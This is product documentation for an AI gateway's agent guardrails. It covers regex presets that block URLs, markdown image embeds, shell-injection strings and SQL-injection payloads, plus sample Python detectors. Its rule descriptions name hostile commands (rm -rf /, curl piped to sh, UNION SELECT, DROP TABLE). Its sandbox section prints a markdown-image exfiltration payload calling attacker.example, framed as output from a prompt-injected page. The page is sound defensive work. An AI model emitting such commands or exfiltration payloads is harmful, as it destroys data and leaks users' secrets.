Agentic guardrails - OrcaRouter

When a model drives tools, the dangerous strings hide in plain content: a URL the agent is about to fetch, a markdown image the client will auto-load, an rm -rf / the model echoes into a shell tool, a UNION SELECT it emits for a SQL runner to execute. A content policy that only looks for PII or secrets misses all four. The Agent preset category exists for exactly this shape: deterministic regex rules that block the request or response before a downstream tool ever acts on it.

This page is a focused landing page for the agentic use case. For the complete guardrail engine (every rule type, field, stage, and route), see the Guardrails reference.

1. Why agent guardrails are a distinct surface

A guardrail screens content: the text in the request and the text in the response. For an agent, that text becomes an action: the URL gets fetched, the markdown gets rendered, the shell line gets run, the SQL gets executed. So the same block / mask engine you use for PII does double duty here, stopping a payload at the gateway before the agent’s tool layer can turn it into a side effect. The Agent category ships four presets, each a single regex rule with the block action, split across the two stages:

URL Filter — input, block

Blocks any http(s) URL on the request. Use it for agent flows where outbound URLs must be allowlisted rather than open. The seeded pattern matches any URL; edit the regex to permit specific domains.

Markdown Image Block — output, block

Blocks markdown image embeds (![alt](url)) in the model’s response. Defends against image-rendering exfiltration on clients that auto-load remote images — a classic data-leak channel where a rendered image URL smuggles data out.

Tool Call Shell Block — input, block

Blocks obvious shell-injection patterns in the request (rm -rf /, curl … | sh, wget … | bash, sudo escalation). Use it for agent flows that may forward user input into a shell tool.

SQL Injection in Output — output, block

Blocks model responses that carry classic SQL-injection payloads (UNION SELECT, OR 1=1, DROP TABLE, comment terminators). Defense-in-depth for tools that auto-execute SQL the model produced.

Two presets screen input, two screen output. URL Filter and Tool Call Shell Block fire on the request — before the model runs, before any quota is metered. Markdown Image Block and SQL Injection in Output fire on the response — after the model answers, before the content reaches your client or its tool layer. Knowing which stage a risk lives on is the whole game; see Input stage and Output stage.
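As a rough illustration of how the four presets divide across the two stages, the sketch below pairs each preset name with a stand-in regex. The patterns, the AGENT_RULES table, and the first_block helper are assumptions written for this example, not the seeded patterns or the gateway's code. They avoid lookarounds and backreferences, so they stay within what RE2 accepts, and the SQL stand-in omits comment terminators for brevity.

```python
import re

# Hypothetical stand-ins for the four Agent presets: (name, stage, pattern).
# The real seeded patterns are not reproduced here.
AGENT_RULES = [
    ("URL Filter", "input", r"https?://\S+"),
    ("Markdown Image Block", "output", r"!\[[^\]]*\]\([^)]*\)"),
    ("Tool Call Shell Block", "input",
     r"rm\s+-rf\s+/|(?:curl|wget)\s[^|\n]*\|\s*(?:ba)?sh\b|\bsudo\s"),
    ("SQL Injection in Output", "output",
     r"\bunion\s+select\b|\bor\s+1\s*=\s*1\b|\bdrop\s+table\b"),
]

# Compile once, reuse for every check.
COMPILED = [
    (name, stage, re.compile(pattern, re.IGNORECASE))
    for name, stage, pattern in AGENT_RULES
]


def first_block(text, stage):
    """Return the name of the first rule that matches at this stage, else None."""
    for name, rule_stage, pattern in COMPILED:
        if rule_stage == stage and pattern.search(text):
            return name
    return None


if __name__ == "__main__":
    print(first_block("please run rm -rf / now", "input"))
    print(first_block("SELECT a FROM t UNION SELECT pw FROM users", "output"))
    print(first_block("https://example.com", "output"))  # input-only rule, no match
```

Note that a rule only sees text at its own stage: a URL in a response passes this sketch because URL Filter is an input-stage rule.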

2. Apply an agent guardrail in the console

Every step here is a console action on the hosted gateway under your own session. Creating and editing guardrails requires Developer+ in the workspace. Only the final /v1/* call uses an sk-orca-... relay key — the guardrail itself is configured entirely in the console.

Open the template

In the console, open Guardrails, click the New guardrail split-button, and pick a preset from the Agent template category — e.g. Markdown Image Block. It seeds the single regex block rule at the right stage.

Name and save

Give it a name (≤ 64 chars), e.g. agent-rails, and save. A preset is a seed, not a lock — add the other three Agent rules or edit the regex freely afterward (see §4).

Test it in the sandbox

Open the Test tab inside the editor, paste a sample, pick the matching stage, and run the current policy locally — no upstream call, no quota (see §3).

Attach a key

Edit an API key and pick agent-rails from the Guardrail dropdown (sets guardrail_id on the key), or mark it the workspace default. See Attach to a key and Account default.

3. Prove it before you attach

Prove the rule fires before any key points at it. Open the Test tab, pick the output stage, and paste a response that an attacker-poisoned page might have coaxed the model into emitting:

Here is the result: ![status](https://attacker.example/track?d=secret)

The sandbox evaluates the current policy locally — nothing is sent upstream, nothing is metered — and returns the block verdict naming the rule that fired. For an A/B grid against a corpus of adversarial and benign samples, the Eval harness lives one tab over.
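To see why the sample above is worth blocking, the following sketch pulls the image URL out of the response and decodes its query string, which is what an auto-loading client would hand to the remote host. The IMAGE pattern and the leaked_params helper are assumptions for illustration, not part of the sandbox.

```python
import re
from urllib.parse import urlsplit, parse_qs

SAMPLE = "Here is the result: ![status](https://attacker.example/track?d=secret)"

# Hypothetical pattern: captures the URL inside a markdown image embed.
IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")


def leaked_params(text):
    """Return (host, query params) for every markdown image found in text."""
    found = []
    for match in IMAGE.finditer(text):
        parts = urlsplit(match.group(1))
        found.append((parts.hostname, parse_qs(parts.query)))
    return found


if __name__ == "__main__":
    # Prints [('attacker.example', {'d': ['secret']})]
    print(leaked_params(SAMPLE))
```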

4. Compose and tune the rules

The four presets are seeds. The common move is to combine them into one agent-rails guardrail and tighten each regex to your stack:

Allowlist URLs

Start from URL Filter, then edit the regex so it blocks every URL except your sanctioned domains, turning the blanket block into an allowlist.

Author your own detectors

Add a regex rule for any payload shape your tools care about — RE2 patterns, linear-time, no backreferences. Patterns compile once and cache across requests.
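For the URL allowlist case, it can help to pin down the intended behaviour before encoding it in a pattern. RE2 has no lookahead, so how the inversion is written as a single regex depends on your domains. The sketch below expresses the same intent in plain Python instead: find every URL, then flag any whose host is not sanctioned. ALLOWED_HOSTS, the example domains, and disallowed_urls are hypothetical names for this example.

```python
import re
from urllib.parse import urlsplit

# Hypothetical URL finder; stops at whitespace and common closing delimiters.
URL = re.compile(r"https?://[^\s)\"'>]+", re.IGNORECASE)

# Hypothetical sanctioned hosts; replace with your own.
ALLOWED_HOSTS = {"docs.example.com", "api.example.com"}


def disallowed_urls(text, allowed=ALLOWED_HOSTS):
    """Return every URL in text whose host is not exactly in the allowlist."""
    bad = []
    for url in URL.findall(text):
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:
            host = ""  # malformed URL: treat as not allowed
        if host not in allowed:
            bad.append(url)
    return bad


if __name__ == "__main__":
    print(disallowed_urls("see https://docs.example.com/a and http://evil.test/x"))
```

Comparing the parsed host exactly, rather than checking that the URL merely contains an allowed domain, keeps lookalikes such as docs.example.com.evil.test and docs.example.com@evil.test on the blocked side. Any regex you derive from this should be tested against the same cases.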

Mix Agent rules with the rest of the engine in one guardrail. Pair them with a PII Shield mask rule or a Secrets Blocker input block — one policy can carry every rule type and the engine folds them into a single verdict. See Actions for block vs. mask vs. flag.

5. What a block looks like

Every Agent preset uses the block action. A blocked request returns HTTP 400 with error code guardrail_blocked and a message naming the guardrail that blocked it:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

A blocked request costs no quota. An input-stage block (URL Filter, Tool Call Shell Block) fires before metering; an output-stage block (Markdown Image Block, SQL Injection in Output) refunds the pre-consumed quota after the response is rejected. Either way the error is marked skip-retry, since re-running the same prompt would just block again. See the guardrail_blocked error.
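On the client side, the practical consequence is that a guardrail block should not be fed into a retry loop. A minimal sketch, assuming the caller already has the HTTP status and the raw response body in hand: is_guardrail_block checks for the error shape shown above, and should_retry is a hypothetical policy (retry on 429 and 5xx only) chosen for this example rather than anything the gateway prescribes.

```python
import json


def is_guardrail_block(status, body):
    """True when the response is an HTTP 400 carrying code guardrail_blocked."""
    if status != 400:
        return False
    try:
        payload = json.loads(body)
    except (TypeError, ValueError):
        return False  # missing or non-JSON body
    if not isinstance(payload, dict):
        return False
    error = payload.get("error")
    return isinstance(error, dict) and error.get("code") == "guardrail_blocked"


def should_retry(status, body):
    """Hypothetical retry policy: never retry a guardrail block."""
    if is_guardrail_block(status, body):
        return False  # the same prompt would just block again
    return status == 429 or status >= 500


if __name__ == "__main__":
    blocked = r'{"error": {"code": "guardrail_blocked", "message": "request blocked by guardrail \"agent-rails\""}}'
    print(is_guardrail_block(400, blocked), should_retry(400, blocked))
```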

Output block is enforced on streaming too. For the two output-stage Agent presets, block holds both ways: on a non-streaming response the answer is screened before it returns, and on a streaming response a scanner cuts the stream mid-flight before any blocked content reaches the client. See Streaming coverage.
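One way to picture mid-stream enforcement is a hold-back scanner: text is released to the client only after it has sat in a buffer long enough for a match to complete. The sketch below is an assumption about the general technique, not the gateway's implementation. IMAGE, StreamBlocked, scan_stream, and the window size are hypothetical, and a match longer than the window could still be partly released.

```python
import re

# Hypothetical stand-in for the Markdown Image Block pattern.
IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")


class StreamBlocked(Exception):
    """Raised when the buffered text matches the block pattern."""


def scan_stream(chunks, pattern=IMAGE, window=256):
    """Yield text from chunks while holding back the newest `window` characters.

    Each chunk is searched together with the held-back tail before anything
    is released, so a match no longer than `window` is caught before any
    part of it is yielded.
    """
    pending = ""
    for chunk in chunks:
        pending += chunk
        if pattern.search(pending):
            raise StreamBlocked(pattern.pattern)
        cut = len(pending) - window
        if cut > 0:
            yield pending[:cut]      # old enough to be safe under the window
            pending = pending[cut:]  # keep the tail for the next search
    if pending:
        yield pending  # end of stream: the tail was already searched


if __name__ == "__main__":
    chunks = ["Here is the result: ![sta", "tus](https://attacker.example/", "track?d=secret)"]
    try:
        for piece in scan_stream(chunks):
            print(piece, end="")
    except StreamBlocked:
        print("[stream cut: guardrail block]")
```

The trade-off is latency against coverage: a larger window delays every token slightly but catches longer payloads split across chunks.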

6. Guardrails are content; the firewall is tool calls

Agent guardrails are a strong first layer, but they reason about strings, not tool semantics. They block a shell line in the content — they do not understand that the model emitted a structured tool_call to a destructive tool, or that an outbound request is heading to a metadata IP. That tool-call layer is the Firewall: it evaluates the model’s emitted tool_calls, MCP tools/call, and outbound egress with verdicts like allow / audit / deny / pending_approval. The two compose — guardrails screen the text, the firewall governs the action.

Firewall

Govern the model’s emitted tool calls, MCP calls, and egress with allow / audit / deny / approval verdicts.

Guardrails vs. Firewall

When to reach for a content guardrail vs. a tool-call firewall — and how to run both.

Securing AI agents

The full agent control stack: content, tools, MCP, and egress.

Excessive agency

The threat these rails address — an agent that does more than it should.

7. See what fired

Every rule that fires records a match — rule type, action, stage, and a detail string — surfaced in the workspace Matches feed. The matched substring itself is recorded only when Log raw content is on, which is off by default. Group and filter the feed by guardrail, rule type, and action to watch your agent-rule hit rate and tune false positives. See Matches feed, Logging & privacy, and Tune false positives.

8. Where to go next

Output-stage rules

How response screening works for Markdown Image Block and SQL Injection in Output.

Regex detectors

Author your own RE2 patterns to extend the Agent rules.

Data exfiltration

The exfil channel Markdown Image Block closes.

Dangerous tool calls

Why a content rail alone isn’t enough — pair it with the firewall.

Agent guardrails keep dangerous strings out of the content an agent sends and receives. To govern the actions an agent takes — the tool calls, MCP calls, and egress themselves — move up to the Firewall and read the securing AI agents baseline. For the complete guardrail engine, see the Guardrails reference.
